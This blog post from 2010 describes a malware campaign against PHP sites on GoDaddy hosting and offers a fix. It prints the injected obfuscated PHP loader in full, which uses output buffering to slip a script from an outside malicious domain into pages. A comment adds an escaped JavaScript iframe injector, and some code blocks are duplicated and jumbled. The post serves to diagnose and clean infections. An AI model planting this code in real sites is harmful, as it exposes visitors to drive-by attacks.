Godaddy PHP sites hacked again

  • Avinash
  • 12
  • Sep 19, 2010
  • Web Development

During April-May of this year, some hackers have attacked on godaddy shared hosted site.
But it seems they are back to work now. Because in past 2-3 also some site (mostly wordpress blogs) have been hacked by this hackers.

Many sites histed by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack. But fortunately I have got the solution and have transferred my hosting also.

Actually this is the malware which is automatically edited into .php files. It will pick any files and paste the code into it.

The seems as below: (This is the some part of the code, not full code)

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2 MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM
oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm
dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g
YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV
qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC
FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2
MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....

So this code is behave as below:
It will generate the PHP code as attached below code snippet and eval function will execute that code.

[email protected](@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4) { [email protected]('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8) { $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16) { $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2) { $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) { $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) { Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) { return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); } else { return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } } ?> if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;       }       return $R034AE2AB94F99CC81B389A1822DA3353;      }     }     function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {      Header('Content-Encoding: none');      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {       return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);      } else {       return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();      }     }     //ob_start('mrobh');    }  } ?>
<?php
  if(function_exists('ob_start')&amp;&amp;!isset($GLOBALS['mr_no']))
  {
    $GLOBALS['mr_no']=1;
    if(!function_exists('mrobh'))
   {
       if(!function_exists('gml'))
      {
           function gml()
           {
               if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&amp;&amp; (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
               {
                   return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9teWJsaW5kc3R1ZGlvaW5mb29ubGluZS5jb20vbGwucGhwIj48L3NjcmlwdD4=");
               }
          return "";
     }

}
if(!function_exists('gzdecode'))
{
   function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
   {
       $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
       $RBE4C4D037E939226F65812885A53DAD9=10;
       $RA3D52E52A48936CDE0F5356BB08652F2=0;
       if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;4)
      {
         $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
         $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
         $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
      }
   if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;8)
   {
        $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
   }
if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;16)
{
      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}

if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;2)
{
   $RBE4C4D037E939226F65812885A53DAD9+=2;
}
$R034AE2AB94F99CC81B389A1822DA3353  = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
{
    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
}
return $R034AE2AB94F99CC81B389A1822DA3353;
}
}
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
{
  Header('Content-Encoding: none');
  $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
  if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE))
  {
    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
  }
  else
  {
    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
  }
}
ob_start('mrobh');
}
}
?>

if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
{       
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      
}      
return $R034AE2AB94F99CC81B389A1822DA3353;     
}    
}    

function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
{     
    Header('Content-Encoding: none');             
   $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
    if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {       return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);      } else {       return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();      }     }     //ob_start('mrobh');   
}
 }
?>

Now, may be other php sites hosted on server other than GoDaddy should have check for this malware for their site.

If you get infected with this malware then run the script from this post and your site will be cured in a moment.

You can also use the same script to verify if your site was infected. If you get a message.

0 Infected Files ./
0 Infected Files ./

..Then your site is clean but if you get the list of infected files, then click on “Fix files” and within a few seconds your site gets clean from this malware.

Thanks blog tips for this trick.

The another solution if, which I have just made and its working for me and some other sites.

Create one file which gets included in your script as the first files. Be sure that on other code isplaced before this file inclusion.

In this file write below code:

<php
  $GLOBALS[‘mr_no’] = 1;
?>

Save this file and upload to your server. This will prevent the malware code to get executed, You can check the very first condition of that code.

Best of luck….

Related Posts

Written by Avinash

Avinash Zala is leading various projects which deals with the various technology involved with the web. A combination of perfect technical and management skills. Avinash would like to chat with you and convert your imagination into the working system. You can get in touch with him on Facebook and Twitter.

View all posts by:

  • http://smssarkar.com Raj

    Today again thousands of websites got infected, godaddy is not even answering the phone…

    for me this fix worked…
    http://alltips.in/how-to-fix-godaddy-malware-attack.html

    thanks..

  • attorney

    Thanks dude. That is fun knowing.

  • Sacramento

    Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up

  • Closeout

    I’m doing some research in this field and your post has helped a lot, thank you.

  • Todd Redfoot

    The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.

    Go Daddy’s Security Team worked quickly to clean and restore all affected sites. The exploit was caused by mailicious files uploaded via FTP to customer websites.

    As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://gdhelp.godaddy.com/article/6

    As always, Go Daddy’s Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy’s 24/7 Customer Support.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    • xpertdev

      Hi Todd,
      Thanks for the information.
      one more question. One of my blog was hacked and its placing some JS code in php files. Code is looks like below:

      eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
      74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%
      22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%
      6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%
      68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%
      66%72%61%6D%65%3E%27%29’));

      I don’t know how to remove this. This website is not hosted in GoDaddy. but any help from your team would be appreciate.
      Thanks
      Avi

  • Cary

    I desired to thank you for this concerning article .I definitely favorite every little bit of it. I have you bookmarked your web site to see at the modern stuff you put up.

  • http://www.144automotive.com Darrin Greenwald

    I think this post was probably a strong start to a potential series of articles about this topic. Most writers pretend to know what they are preaching about when it comes to this stuff and really, nearly no one actually get it. You seem to know about it however, so I think you ought to take it and run. Thank you!

  • http://insurancemanual.info lerp life insurance

    I’m very glad that you said this!?!

  • weighty

    gonna send this to my mom

  • Jeanette Boutros

    Thanks for posting this.

  • Vivien Buer

    Thanks for the info, been looking everywhere for information on this.